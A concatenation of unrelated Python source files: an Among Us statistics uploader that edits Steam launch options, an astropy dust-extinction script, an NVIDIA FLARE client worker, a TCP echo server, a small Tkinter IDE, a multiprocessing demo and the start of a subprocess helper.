data['lastUpdated'] = datetime.datetime.now().strftime('%d-%m-%Y %H:%M:%S')
with open(rf"{STAT_DIR}\playerStats2", "rb") as f:
i = -1
n = 4
x = 0
while (byte := f.read(1)):
if i % n == 0:
try:
data[stats[x]] = bytes_to_int(byte)
except IndexError:
break
x += 1
i += 1
payload = json.dumps(data)
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
try:
response = requests.post(URL, data = payload, headers=headers)
if response.status_code == 200:
log('Successfully uploaded player statistics')
else:
log(f'A connection error occured while trying to upload player statistics to {URL}')
except requests.exceptions.RequestException as e:
log('The following error occured while trying to upload player statistics:')
log(e)
# Function to run the thread that will monitor for changes to the stats file and push updates
def run():
# Launch game from the argument passed to this program (Game Executable Path)
os.startfile(sys.argv[1])
# Log the client opening
log("Among Us has been launched")
# Grab statistics upon loading the game
grabStats()
# Wait for process to load before checking status
time.sleep(5)
# Grab last modified timestamp for player statistics as a baseline
lastModifiedStats = os.stat(rf"{STAT_DIR}\playerStats2").st_mtime
# Loop to check for updates to current player statistics file
while process_running(AMONG_US_EXE):
statsModified = os.stat(rf"{STAT_DIR}\playerStats2").st_mtime
if statsModified > lastModifiedStats:
log("Change to statistics detected. Uploading latest statistics")
grabStats()
lastModifiedStats = statsModified
time.sleep(10)
# Log the game closing
log("Among Us has been closed")
# Exit the script completely
os._exit(1)
# Function that updates Steam config to run application when starting Among Us
def updateConfig(file):
count = 0
addHere = False
with open(file, 'r+', encoding="utf8") as fd:
contents = fd.readlines()
if GAME_ID in contents[-1]:
contents.append(LAUNCH_OPTIONS)
else:
for index, line in enumerate(contents):
if GAME_ID in line:
if count == 1:
addHere = True
count += 1
if addHere:
if "}" in line:
if 'LaunchOptions' not in contents[index - 1]:
contents.insert(index, LAUNCH_OPTIONS + '\n')
else:
del contents[index - 1]
contents.insert(index - 1, LAUNCH_OPTIONS + '\n')
break
fd.seek(0)
fd.writelines(contents)
# Function to open the GUI which allows users to change settings, etc
def openGUI(mode):
# Define URL as global so we can change the value in the updater thread too
global URL
# Path to loginusers.vdf file which contains list of all Steam accounts on PC
steamUsers = get_reg(r"SteamPath", REG_STEAM) + "/config/loginusers.vdf"
# Extract the currently used profile from the windows registry (if it exists)
defaultProfile = get_reg(r"SteamUser", REG_AMONG_US)
# Dictionary which will store Steam Alias & ID used for config directory path
userKey = {}
# Array containing a list of all Steam Aliases - Used to lookup above dictionary
userVal = []
# Set the overall theme of the window to "Dark Blue"
sg.theme('DarkBlue')
# Open the config file that contains list of all Steam accounts and extract required info
with open(steamUsers) as f:
lines = f.readlines()
i = 0
for line in lines:
if "PersonaName" in line:
userKey[(line.replace('\t\t"PersonaName"\t\t', '').replace('"','').replace('\n', ''))] = int(lines[i - 3].replace('\t','').replace('"', '')) - STEAMID64
userVal.append(line.replace('\t\t"PersonaName"\t\t', '').replace('"','').replace('\n', ''))
i += 1
# Define the layout of our GUI and the conditions required
layout = [
[sg.Text("Steam Profile to use:")],
[sg.Combo(userVal, default_value=defaultProfile, enable_events=True, key='-PROFILE-', readonly=True, size=(30,1), disabled=True if mode == "BACKGROUND" else False)],
[sg.Text(size=(30,0.5))],
[sg.Text("REST Endpoint to upload Statistics to:")],
[sg.In(URL, size=(30, 1), enable_events=True, key="-REST-")],
[sg.Button('Test Endpoint',size=(10,1), disabled=True, button_color=('grey', 'lightgrey')),sg.Text(key="-STATUS-")],
[sg.Text(size=(30,0.5))],
[sg.Button('Apply' if mode == "BACKGROUND" else "Install"), sg.Button('Close' if mode == 'BACKGROUND' else 'Exit')]
]
layoutPopup = [
[sg.Text('Steam will be closed while\nchanges are made.\n\nWould you like to continue?\n')],
[sg.Button('Yes'), sg.Button('No')]
]
layoutPopup2 = [
[sg.Text('You can now play Among us as normal.\n\nClick OK to exit setup.')],
[sg.Button('OK')]
]
# Create the window
window = sg.Window(APP_NAME, layout, auto_size_buttons=True, resizable=False, disable_close=False, disable_minimize=True, icon=ICON)
# Create an event loop
while True:
event, values = window.read()
# If Exit/Close or the X are pressed, exit the GUI loop
if event == "Exit" or event == "Close" or event == sg.WIN_CLOSED:
break
# If any change is detected to the Steam Profile dropdown, re-enable the Install button
if event == "-PROFILE-":
window['Install' if mode == 'INTERACTIVE' else 'Apply'].update(disabled=False)
window['Install' if mode == 'INTERACTIVE' else 'Apply'].update(button_color=('black', 'white'))
# If the Test Endpoint button is pressed, Disable button & ping endpoint.
if event == "Test Endpoint":
window['Test Endpoint'].update(disabled=True)
window['Test Endpoint'].update(button_color=('grey', 'lightgrey'))
try:
response = requests.post(values['-REST-'])
if response.status_code == 200:
window['-STATUS-'].update('Success', text_color='green')
else:
window['-STATUS-'].update('Failed', text_color='red')
except requests.exceptions.RequestException as e:
log('The following error occured while trying to test the REST Endpoint:')
log(values['-REST-'])
log(e)
# If change detected to the -REST- string then re-enable install & test buttons
if event == "-REST-":
window['Test Endpoint'].update(disabled=False)
window['Test Endpoint'].update(button_color=('black', 'white'))
window['Install' if mode == 'INTERACTIVE' else 'Apply'].update(disabled=False)
window['Install' if mode == 'INTERACTIVE' else 'Apply'].update(button_color=('black', 'white'))
# If Install/Update selected then update all relevant values to registry
if event == "Install" or event == "Apply":
steamOpen = False
# Disable Install/Update button to stop spam
window['Install' if mode == 'INTERACTIVE' else 'Apply'].update(disabled=True)
window['Install' if mode == 'INTERACTIVE' else 'Apply'].update(button_color=('grey', 'lightgrey'))
# If Steam is running and application running in interactive mode, close it first
if mode == "INTERACTIVE" and process_running(STEAM_EXE):
warningPopup = sg.Window("Alert!", layoutPopup, auto_size_buttons=True, resizable=False, disable_close=False, disable_minimize=True, icon=ICON)
closeSteam = warningPopup.read()
warningPopup.close()
if closeSteam[0] == 'Yes':
subprocess.call(["TASKKILL","/F","/IM",STEAM_EXE], shell=True)
time.sleep(2)
steamOpen = True
else:
continue
set_reg(r"Install Path", APP_EXE, REG_AMONG_US)
set_reg(r"SteamUser", values['-PROFILE-'], REG_AMONG_US)
set_reg(r"SteamDir", str(userKey[values['-PROFILE-']]), REG_AMONG_US)
set_reg(r"REST Endpoint", values['-REST-'], REG_AMONG_US)
set_reg(r"Version", VERSION, REG_AMONG_US)
URL = values['-REST-']
updateConfig(STEAM_CONFIG_PATH.format(userKey[values['-PROFILE-']]))
if mode == "INTERACTIVE":
sg.Window("Script has been Installed!", layoutPopup2, auto_size_buttons=True, resizable=False, disable_close=False, disable_minimize=True, icon=ICON).read()
if steamOpen:
subprocess.Popen(STEAM_EXE_PATH)
break
else:
sg.popup("Settings have been successfully applied.")
window.close()
# Function that controls the main loop of the program & the tray icon
def mainGUI(mode):
# Build tray menu & create tray
menu_def = ['BLANK', ['Settings', 'About', '---', 'Exit']]
tray = sg.SystemTray(menu=menu_def, filename=ICON, tooltip=APP_NAME)
# Main event loop
while True:
if mode == "INTERACTIVE":
openGUI(mode)
break
# React to any events from the tray menu
menu_item = tray.read()
if menu_item == 'Exit':
break
elif menu_item == 'Settings':
openGUI(mode)
# Entry function that detetcs which mode the application has been opened in.
def main():
# If ran via Steam & Reg Keys found, run in Background mode
if get_reg(r"Install Path", REG_AMONG_US) and len(sys.argv) >= 2:
thread = threading.Thread(target=run, args=())
thread.daemon = True
thread.start()
mode = "BACKGROUND"
# Otherwise, run in interactive mode, loading the GUI.
else:
mode = "INTERACTIVE"
# Call main GUI function with current mode as a parameter
mainGUI(mode)
if __name__ == '__main__':
main()
|
randomGal.py
|
#randomGal.py
from astropy import units as u
from astropy import coordinates
from astroquery.ned import Ned
from astroquery.irsa_dust import IrsaDust
from astropy.coordinates import Angle,ICRS,SkyCoord
from astropy.coordinates.name_resolve import NameResolveError
import math
import os.path
import sys
import itertools
import threading
import time
import requests
from astropy.coordinates import SkyCoord
from random import randint
#LOOK AT QUICKDATA.PY FOR MULTIPLE GALAXY CONFIG
def getRandomCoordinate():
h = randint(0,23)
# print("h = " + str(h))
m = randint(0,59)
# print("m = " + str(m))
s = randint(0,59)
# print("s = " + str(s))
d = randint(-89,89)
# print("d = " + str(d))
arcm = randint(0,59)
# print("arcm = " + str(arcm))
arcs = randint(0,59)
# print("arcs = " + str(arcs))
ra = Angle((h, m, s), unit=u.hour) #creating right ascension angle
dec = Angle((d, arcm, arcs), unit=u.deg) #creating declination angle
# print(ra.to_string())
# print(dec.to_string())
return SkyCoord(ra, dec, frame = 'fk5')
# import pandas as pd:
import csv
def readCoordinate():
names = [None]*462 #there are 462 entries
read_file = 'cepheidGals.csv'
i = 0
with open(read_file) as csvinp:
reader = csv.reader(csvinp,delimiter = ',')
for row in reader:
names[i] = row[0]
try:
tcoord = SkyCoord.from_name(row[0],frame = 'icrs')
coords[i] = tcoord
except:
print(row[0])
i-=1
# ra = row[1]
# dec = row[2]
#SkyCoord(ra,dec,frame = 'fk5')
i+=1
return [names,coords]
def timeFix(s,m,h): #fixes time to ensure it stays within normal range (0-60)
if(s>=60 or m>=60):
while(s>=60 or m>=60):
if s >= 60:
m+=1
s-=60
if m >= 60:
if h == 23:
h = 0
m-=60
else:
h+=1
m-=60
elif(s<0 or m<0):
while(s<0 or m<0):
if s < 0:
m-=1
s+=60
if m < 0:
if h == 0:
h = 23
m+=60
else:
h-=1
m+=60
return s,m,h;
def fourCoord(dam,ra,dec,coord):
ds = dam*4
coord[0] = ra.to_string()+" "+dec.to_string()
#n
decli = dec.arcminute+dam
if decli > 90:
decli -=90
decl = Angle(decli,u.arcminute)
decl = Angle(decl.to_string(unit=u.degree),u.degree)
coord[1] = ra.to_string()+" "+decl.to_string()
#e
ds/=math.cos(math.radians(dec.degree))
h = ra.hms.h
m = ra.hms.m
s = ra.hms.s+ds
(s,m,h) = timeFix(s,m,h)
rad = Angle((h,m,s), unit = u.hour)
rad = Angle(rad.to_string(unit=u.hour),u.hour)
coord[2] = rad.to_string()+" "+dec.to_string()
#w
ds=ds*(-1)
ds/=math.cos(math.radians(dec.degree))
h = ra.hms.h
m = ra.hms.m
s = ra.hms.s+ds
(s,m,h) = timeFix(s,m,h)
rad = Angle((h,m,s), unit = u.hour)
rad = Angle(rad.to_string(unit=u.hour),u.hour)
coord[4] = rad.to_string()+" "+dec.to_string()
#s
decli = dec.arcminute-dam
if decli < 0:
decli +=90
decl = Angle(decli,u.arcminute)
decl = Angle(decl.to_string(unit=u.degree),u.degree)
coord[3] = ra.to_string()+" "+decl.to_string()
#print(coord)
return coord; #performs transformation of initial coord into cardinal coordinates
def tableFill(dam, ra, dec):
curVal = [None] *5 #n = 0, e = 1, s = 2, w = 3
coord = [None] *5 #n = 0, e = 1, s = 2, w = 3
#get values for each arcminute
for j in range(dam,dam+1): #change 1st dam to 0 for concurrent values
coord = fourCoord(j, ra, dec, coord)
for i in range(0,5):
try:
C = coordinates.SkyCoord(coord[i])
table = IrsaDust.get_extinction_table(C.fk5, show_progress = False)
curVal[i] = (table['A_SandF'][2])
except Exception as e:
curVal = [None] * 5
break
# output1.write('\n')
return curVal
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rloading ' + c)
sys.stdout.flush()
time.sleep(0.1)
print(chr(27) + "[2J")
sys.stdout.write('\rDone!')
# MAIN FUNCTION
if __name__ == '__main__':
write_file = 'randomAV.csv'
arcMinutes = 20
done = False
print(chr(27) + "[2J")
threader = threading.Thread(target=animate)
threader.start()
coords = [None] * 462
avData = [None] * len(coords)
with open(write_file,'w') as output:
output.write(str(arcMinutes) + " Arcminutes\nCenter, North, East, South, West\n")
output.close()
[names, coords] = readCoordinate()
for i in range(0,len(coords)):
# coords[i] = getRandomCoordinate()
with open(write_file,'a') as output1:
try:
avData[i] = tableFill(arcMinutes,coords[i].ra,coords[i].dec)
output1.write(str(names[i]) + ',' + str(coords[i].ra.to_string(unit = u.hour)) + ',' + str(coords[i].dec.to_string()) + '\n')
for j in avData[i]:
output1.write(str(j) + ',')
output1.write('\n')
output1.close()
print('\n'+str(len(coords)-1-i) + " left!")
except Exception as e:
print(e)
done = True
|
worker_process.py
|
# Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Provides a command line interface for a federated client trainer."""
import argparse
import logging
import os
import sys
import threading
import time
import psutil
from nvflare.apis.fl_constant import FLContextKey, WorkspaceConstants
from nvflare.apis.workspace import Workspace
from nvflare.fuel.sec.security_content_service import SecurityContentService
from nvflare.fuel.utils.argument_utils import parse_vars
from nvflare.private.defs import EngineConstant
from nvflare.private.fed.app.fl_conf import FLClientStarterConfiger
from nvflare.private.fed.client.client_json_config import ClientJsonConfigurator
from nvflare.private.fed.client.client_run_manager import ClientRunManager
from nvflare.private.fed.client.client_runner import ClientRunner
from nvflare.private.fed.client.client_status import ClientStatus
from nvflare.private.fed.client.command_agent import CommandAgent
from nvflare.private.fed.utils.fed_utils import add_logfile_handler
def check_parent_alive(parent_pid, stop_event: threading.Event):
while True:
if stop_event.is_set():
break
if not psutil.pid_exists(parent_pid):
# if parent is not alive, kill its worker process
os.killpg(os.getpgid(os.getpid()), 9)
break
time.sleep(1)
def main():
"""Worker process start program."""
parser = argparse.ArgumentParser()
parser.add_argument("--workspace", "-m", type=str, help="WORKSPACE folder", required=True)
parser.add_argument("--startup", "-w", type=str, help="startup folder", required=True)
parser.add_argument("--token", "-t", type=str, help="token", required=True)
parser.add_argument("--ssid", "-d", type=str, help="ssid", required=True)
parser.add_argument("--job_id", "-n", type=str, help="job_id", required=True)
parser.add_argument("--client_name", "-c", type=str, help="client name", required=True)
parser.add_argument("--listen_port", "-p", type=str, help="listen port", required=True)
parser.add_argument("--sp_target", "-g", type=str, help="Sp target", required=True)
parser.add_argument(
"--fed_client", "-s", type=str, help="an aggregation server specification json file", required=True
)
parser.add_argument("--set", metavar="KEY=VALUE", nargs="*")
parser.add_argument("--local_rank", type=int, default=0)
args = parser.parse_args()
kv_list = parse_vars(args.set)
# get parent process id
parent_pid = os.getppid()
args.train_config = os.path.join("config", "config_train.json")
config_folder = kv_list.get("config_folder", "")
secure_train = kv_list.get("secure_train", True)
if config_folder == "":
args.client_config = "config_fed_client.json"
else:
args.client_config = os.path.join(config_folder, "config_fed_client.json")
args.config_folder = config_folder
args.env = os.path.join("config", "environment.json")
try:
remove_restart_file(args)
except BaseException:
print("Could not remove the restart.fl / shutdown.fl file. Please check your system before starting FL.")
sys.exit(-1)
restart_file = os.path.join(args.workspace, "restart.fl")
if os.path.exists(restart_file):
os.remove(restart_file)
print("starting the client .....")
startup = os.path.join(args.workspace, "startup")
SecurityContentService.initialize(content_folder=startup)
thread = None
stop_event = threading.Event()
deployer = None
command_agent = None
federated_client = None
startup = args.startup
app_root = os.path.join(
args.workspace,
WorkspaceConstants.WORKSPACE_PREFIX + str(args.job_id),
WorkspaceConstants.APP_PREFIX + args.client_name,
)
logging_setup(app_root, args, config_folder, startup)
log_file = os.path.join(args.workspace, args.job_id, "log.txt")
add_logfile_handler(log_file)
logger = logging.getLogger("worker_process")
logger.info("Worker_process started.")
try:
# start parent process checking thread
thread = threading.Thread(target=check_parent_alive, args=(parent_pid, stop_event))
thread.start()
conf = FLClientStarterConfiger(
app_root=startup,
client_config_file_name=args.fed_client,
log_config_file_name=args.log_config,
kv_list=args.set,
logging_config=False,
)
conf.configure()
deployer = conf.base_deployer
federated_client = deployer.create_fed_client(args, args.sp_target)
federated_client.status = ClientStatus.STARTING
federated_client.token = args.token
federated_client.ssid = args.ssid
federated_client.client_name = args.client_name
federated_client.fl_ctx.set_prop(FLContextKey.CLIENT_NAME, args.client_name, private=False)
federated_client.fl_ctx.set_prop(EngineConstant.FL_TOKEN, args.token, private=False)
federated_client.fl_ctx.set_prop(FLContextKey.WORKSPACE_ROOT, args.workspace, private=True)
client_config_file_name = os.path.join(app_root, args.client_config)
conf = ClientJsonConfigurator(
config_file_name=client_config_file_name,
)
conf.configure()
workspace = Workspace(args.workspace, args.client_name, config_folder)
run_manager = ClientRunManager(
client_name=args.client_name,
job_id=args.job_id,
workspace=workspace,
client=federated_client,
components=conf.runner_config.components,
handlers=conf.runner_config.handlers,
conf=conf,
)
federated_client.run_manager = run_manager
with run_manager.new_context() as fl_ctx:
fl_ctx.set_prop(FLContextKey.CLIENT_NAME, args.client_name, private=False)
fl_ctx.set_prop(EngineConstant.FL_TOKEN, args.token, private=False)
fl_ctx.set_prop(FLContextKey.WORKSPACE_ROOT, args.workspace, private=True)
fl_ctx.set_prop(FLContextKey.ARGS, args, sticky=True)
fl_ctx.set_prop(FLContextKey.APP_ROOT, app_root, private=True, sticky=True)
fl_ctx.set_prop(FLContextKey.WORKSPACE_OBJECT, workspace, private=True)
fl_ctx.set_prop(FLContextKey.SECURE_MODE, secure_train, private=True, sticky=True)
client_runner = ClientRunner(config=conf.runner_config, job_id=args.job_id, engine=run_manager)
run_manager.add_handler(client_runner)
fl_ctx.set_prop(FLContextKey.RUNNER, client_runner, private=True)
# Start the command agent
command_agent = CommandAgent(federated_client, int(args.listen_port), client_runner)
command_agent.start(fl_ctx)
federated_client.status = ClientStatus.STARTED
client_runner.run(app_root, args)
except BaseException as e:
logger.error(f"FL client execution exception: {e}", exc_info=True)
raise e
finally:
stop_event.set()
if command_agent:
command_agent.shutdown()
if deployer:
deployer.close()
if federated_client:
federated_client.close()
if thread and thread.is_alive():
thread.join()
def logging_setup(app_root, args, config_folder, startup):
app_log_config = os.path.join(app_root, config_folder, "log.config")
if os.path.exists(app_log_config):
args.log_config = app_log_config
else:
args.log_config = os.path.join(startup, "log.config")
log_config_file_path = os.path.join(app_root, args.log_config)
logging.config.fileConfig(fname=log_config_file_path, disable_existing_loggers=False)
def remove_restart_file(args):
"""To remove the restart.fl file.
Args:
args: command args
"""
restart_file = os.path.join(args.workspace, "restart.fl")
if os.path.exists(restart_file):
os.remove(restart_file)
restart_file = os.path.join(args.workspace, "shutdown.fl")
if os.path.exists(restart_file):
os.remove(restart_file)
if __name__ == "__main__":
"""
This is the program when starting the child process for running the NVIDIA FLARE executor.
"""
main()
|
tcp_server.py
|
# -*- coding:utf8 -*-
import socket
import threading
import time
def tcplink(sock, addr):
print("accept new connection from %s:%s..." % addr)
sock.send("Welcom!".encode())
while True:
data = sock.recv(1024)
time.sleep(1)
if data == 'exit' or not data:
break
sock.send("hello: ".encode() + data)
sock.close()
print("Connection from %s:%s closed." % addr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 创建一个基于ipv4 的TCP协议的socket
s.bind(('127.0.0.1', 9999)) # 监听端口
s.listen(5)
print("Waiting for connection......")
while True:
sock, addr = s.accept()
t = threading.Thread(target=tcplink, args=(sock, addr))
t.start()
|
Scripty.py
|
#!/usr/bin/env python3
# An open-source IDE for python, java, and C++
# By Jaden Arceneaux arceneauxJaden@gmail.com
# Feel free to change code as you feel
import sys
import os
# For running commands in the terminal
try:
from tkinter import *
from tkinter import messagebox
from tkinter import filedialog
except:
os.system('sudo apt-get install python3-tk')
from tkinter import *
from tkinter import messagebox
from tkinter import filedialog
# Checks if tkinter is installed
# if not then installs it
# used for UI
import json
# For parsing json files
import time
import threading
# For running multiple tasks on the CPU
os.system('chmod +x Scripty.py')
appAlive = True
# This keeps track of whether the app is still open
# Used for killing threads
defaultConfigFile = open('Settings/DefaultConfig.json')
defaultConfigFile = defaultConfigFile.read()
defaultConfigFile = json.loads(defaultConfigFile)
# This opens and parses the defaut config file
configFile = open('Settings/Config.json')
configFile = configFile.read()
try:
configFile = json.loads(configFile)
except:
configFile = defaultConfigFile
# This attemts to open the user config file; if json error is
# thrown opens default file
styleSheet = open("Settings/Themes/" + configFile["theme"].lower() + '.json')
styleSheet = json.loads(styleSheet.read())
os.system('clear')
# ^ clears the terminal at the start of the program
window = Tk()
window.geometry("550x350")
# ^ declared window and sets size (in pixels)
if sys.argv[-1] == "Scripty.py":
fileLine = filedialog.asksaveasfilename(initialdir = "~/Scripty/Projects",title = "Select file",filetypes = (("All Files","*.*"),("C++","*.cpp"), ("Java", "*.java"), ("Python", "*.py")))
else:
fileLine = 'Projects/' + str(sys.argv[-1])
window.title(str(fileLine))
# ^ find the arument for which file to edit in the terminal
# and sets it as the title of the window
try:
try:
currFile = open(str(fileLine))
except:
newFile = open(str(fileLine), "w")
newFile.close()
currFile = open(str(fileLine))
except:
i = 0
while '/' in fileLine:
fileLine.replace(fileLine[i], "")
try:
currFile = open(str(fileLine))
except:
newFile = open(str(fileLine), "w")
newFile.close()
currFile = open(str(fileLine))
# This tests to see if the file the user inputed exists other wise it will create a new one
if configFile['line-wrap'] == True:
if configFile['line-wrap-type'] == 'CHAR':
editor = Text(window, wrap = CHAR)
elif configFile['line-wrap-type'] == 'WORD':
editor = Text(window, wrap = WORD)
else:
editor = Text(window, wrap = CHAR)
for line in currFile:
editor.insert(INSERT, line)
editor.place(rely = 0.07, relx = 0, relheight = 0.93, relwidth = 1.0)
else:
scrollbar = Scrollbar(window, orient=HORIZONTAL, background = styleSheet['bg-color'])
scrollbar.place(relx = 0, rely = 0.95, relheight = 0.05)
editor = Text(window, wrap = NONE)
editor.config(yscrollcommand=scrollbar.set)
scrollbar.config(command=editor.xview)
for line in currFile:
editor.insert(INSERT, line)
editor.place(rely = 0.07, relx = 0, relheight = 0.88, relwidth = 1.0)
# checks if line wrap is enabled and which kind on line wrap it is
# if line wrap is not enable it enables the scroll butttons
def save():
global appAlive
try:
user = editor.get('1.0', END)
file = open(str(fileLine), "w")
file.write(user)
file.close()
except:
appAlive = False
# Save function
# it takes all the text in the editor and writes it to the appropriate file
def saveShortCut(arg):
save()
# This function maps the save function to work with a keyboard shortcut
def openWindow():
global editor, fileLine
openFile = str(filedialog.asksaveasfilename(initialdir = "~/Scripty/Projects",title = "Select file",filetypes = (("All Files","*.*"),("C++","*.cpp"), ("Java", "*.java"), ("Python", "*.py"))))
editor.delete('1.0', END)
openFileData = open(openFile)
openFileData = openFileData.read()
editor.insert(INSERT, openFileData)
fileLine = openFile
i = 0
while i < len(fileLine):
if '/' in fileLine:
fileLine.replace(fileLine[i], "")
i += 1
window.title(str(fileLine))
# redraw the editor but skinner and left sided
# This function allows the user to open muiltiple files
def saveAs():
global fileLine, appAlive
fileLine = filedialog.asksaveasfilename(initialdir = "~/Scripty/Projects",title = "Select file",filetypes = (("All Files","*.*"),("C++","*.cpp"), ("Java", "*.java"), ("Python", "*.py")))
try:
user = editor.get('1.0', END)
file = open(str(fileLine), "w")
file.write(user)
file.close()
except:
appAlive = False
window.title(str(fileLine))
# Function for save as button
def executeCode():
save()
# saves file before running
if configFile['clear-on-run'] == True:
os.system('clear')
# checks if clear on run is enabled in settings
# if so clears terminal before running code
if '.py' in fileLine:
os.system('python3 ' + str(fileLine))
elif '.java' in fileLine:
os.system('javac ' + str(fileLine))
os.system('cd Projects && java ' + (fileLine[:-5]).replace('Projects/', ''))
elif '.cpp' in fileLine:
os.system('g++ ' + str(fileLine) + ' -o ' + fileLine[:-4])
os.system('cd / && .' + fileLine[:-4])
elif '.cs' in fileLine:
os.system('dotnet run ' + fileLine)
elif '.c' in fileLine:
os.system('gcc ' + str(fileLine) + ' -o ' + fileLine[:-2])
os.system('cd / && .' + fileLine[:-2])
elif '.js' in fileLine:
os.system('node ' + str(fileLine))
# finds which programming language the program is written in
# runs code using that language
def enableEditor():
editor.configure(state=NORMAL)
# sets editor to is enabled state
def run():
if configFile['run-lock'] == False:
runThread = threading.Thread(target = executeCode, name = "runThread1")
runThread.start()
else:
editor.configure(state=DISABLED)
# disables editor while running if run lock is True
runThread = threading.Thread(target = executeCode, name = "runThread1")
runThread.start()
runThread.join()
enableThread = threading.Thread(target = enableEditor, name = "enableThread1")
enableThread.start()
enableThread.join()
# once it is done running renables editor
# function for running code
def runShortCut(arg):
runThread = threading.Thread(target = executeCode, name = "runThread1")
runThread.start()
# keyboard short cut for running code
# accepts argument from keyboard
def clear():
os.system('clear')
# function for clearing terminal
def settings():
settingsWin = Tk()
settingsWin.geometry("350x600")
settingsWin.title("Settings")
# delcares settings window
def saveSettings():
with open('Settings/Config.json', 'w') as configFile:
newSettings = settingsEditor.get('1.0', END)
configFile.write(newSettings)
messagebox.showinfo("WAIT", "Please reload to apply changes")
# function for saving settings
saveSettingsBtn = Button(settingsWin, text = 'Save', command = lambda: saveSettings())
saveSettingsBtn.place(relx = 0, rely = 0, relwidth = 1.0, relheight = 0.1)
# declares saveSettingsButton
settingsEditor = Text(settingsWin)
settingsEditor.place(relx = 0, rely = 0.1, relwidth = 1.0, relheight = 0.9)
# delcares settings editor
def tab(arg):
settingsEditor.insert(INSERT, " " * configFile["default-indent-spacing"])
return 'break'
settingsEditor.bind("<Tab>", tab)
# binds tab to appropriate spacing
settingsEditor.insert(INSERT, open('Settings/Config.json').read())
saveSettingsBtn.configure(background=styleSheet["button-color"], foreground = styleSheet["font-color"], highlightthickness = 0, bd = 0)
settingsEditor.configure(background=styleSheet["bg-color"], foreground = styleSheet["font-color"], insertbackground=styleSheet["curser-color"], highlightthickness = 0, bd = 0)
# configures settings editor and buttons to match styling
settingsWin.mainloop()
def autoSave():
if configFile["auto-save"] == True:
while appAlive == True:
save()
time.sleep(configFile["auto-save-interval"])
# function for auto save
runBtn = Button(window, text = "Run", command = lambda: run())
runBtn.place(relx = 0, rely = 0, relwidth = 0.18, relheight = 0.07)
# delcares run button
saveBtn = Button(window, text = "Save", command = lambda: save())
saveBtn.place(relx = 0.18, rely = 0, relwidth = 0.18, relheight = 0.07)
# delcares save button
saveAsBtn = Button(window, text = "Save As", command = lambda: saveAs())
saveAsBtn.place(relx = 0.36, rely = 0, relwidth = 0.18, relheight = 0.07)
# delcares save as button
openBtn = Button(window, text = "Open", command = lambda: openWindow())
openBtn.place(relx = 0.54, rely = 0, relwidth = 0.18, relheight = 0.07)
# delcares open button
clearBtn = Button(window, text = "Clear", command = lambda: clear())
clearBtn.place(relx = 0.72, rely = 0, relwidth = 0.18, relheight = 0.07)
# delcares clear button
settingsBtn = Button(window, text = configFile["settings-icon"], command = lambda: settings())
settingsBtn.place(relx = 0.9, rely = 0, relwidth = 0.1, relheight = 0.07)
# delcares settings button
def tab(arg):
if '.py' in str(fileLine):
editor.insert(INSERT, " " * configFile["python-indent-spacing"])
elif '.java' in str(fileLine):
editor.insert(INSERT, " " * configFile["java-indent-spacing"])
elif '.cpp' in str(fileLine):
editor.insert(INSERT, " " * configFile["cpp-indent-spacing"])
elif '.js' in str(fileLine):
editor.insert(INSERT, " " * configFile["js-indent-spacing"])
else:
editor.insert(INSERT, " " * configFile["default-indent-spacing"])
return 'break'
# maps tab to appropriate spacing
def paraComplete(arg):
editor.insert(INSERT, "()")
return 'break'
# inserts ()
def curlComplete(arg):
editor.insert(INSERT, "{}")
return 'break'
# inserts {}
def bracketComplete(arg):
editor.insert(INSERT, "[]")
return 'break'
# inserts []
def arrowComplete(arg):
editor.insert(INSERT, "<>")
return 'break'
# inserts <>
def dubQuoteComplete(arg):
editor.insert(INSERT, '""')
return 'break'
# inserts ""
def singQuoteComplete(arg):
editor.insert(INSERT, "''")
return 'break'
# inserts ''
def autoIndent(arg):
if str(' ' * configFile["python-indent-spacing"]) in editor.get(INSERT):
editor.insert(INSERT, " ")
# will automaticly indent to the appropreat spacing
# work in progess
editor.bind("<Tab>", tab)
editor.bind(configFile["run-shortcut"], runShortCut)
editor.bind(configFile["save-shortcut"], saveShortCut)
if configFile["auto-indent"] == True:
editor.bind("<0xff0d>", autoIndent)
if configFile["auto-complete"] == True:
editor.bind("<0x0028>", paraComplete)
editor.bind("<0x08af>", curlComplete)
editor.bind("<0x005b>", bracketComplete)
editor.bind("<Shift-0x002c>", arrowComplete)
editor.bind("<Shift-0x0ad0>", dubQuoteComplete)
editor.bind("<0x0ad0>", singQuoteComplete)
# checks if auto complete is inabled
# if so binds keys
editor.configure(background=styleSheet["bg-color"], foreground = styleSheet["font-color"])
editor.configure(insertbackground=styleSheet["curser-color"])
editor.configure(font = (styleSheet["font"], configFile["font-size"]), highlightthickness = 0, bd = 0)
settingsBtn.configure(background=styleSheet["button-color"], foreground = styleSheet["font-color"], highlightthickness = 0, bd = 0)
clearBtn.configure(background=styleSheet["button-color"], foreground = styleSheet["font-color"], highlightthickness = 0, bd = 0)
saveAsBtn.configure(background=styleSheet["button-color"], foreground = styleSheet["font-color"], highlightthickness = 0, bd = 0)
runBtn.configure(background=styleSheet["button-color"], foreground = styleSheet["font-color"], highlightthickness = 0, bd = 0)
saveBtn.configure(background=styleSheet["button-color"], foreground = styleSheet["font-color"], highlightthickness = 0, bd = 0)
openBtn.configure(background=styleSheet["button-color"], foreground = styleSheet["font-color"], highlightthickness = 0, bd = 0)
# configures buttons and text editor to match style
autoSaveThread = threading.Thread(target = autoSave, name = "autosave1")
autoSaveThread.start()
# starts autosave thread
window.mainloop()
|
mp_process03-2.py
|
from multiprocessing import Process, Manager
def func(d, l):
d[1] = '1'
d['2'] = 2
d[0.25] = None
l.reverse()
if __name__ == '__main__':
with Manager() as manager:
d = manager.dict()
l = manager.list(range(10))
p = Process(target=func, args=(d, l))
p.start()
p.join()
print(d)
print(l)
|
shell.py
|
import logging
import subprocess
import threading
import typing
logger = logging.getLogger(__name__)
class BaseError(Exception):
pass
class SubprocessFailed(BaseError):
pass
def execute(args, *, env=None, verbose: int, command_alias: str) -> None:
buffer: typing.List[str] = []
lock_process_completion = threading.Lock()
process_completed = False
def _capture_output():
for line in process.stdout:
try:
decoded = line.decode('utf-8')
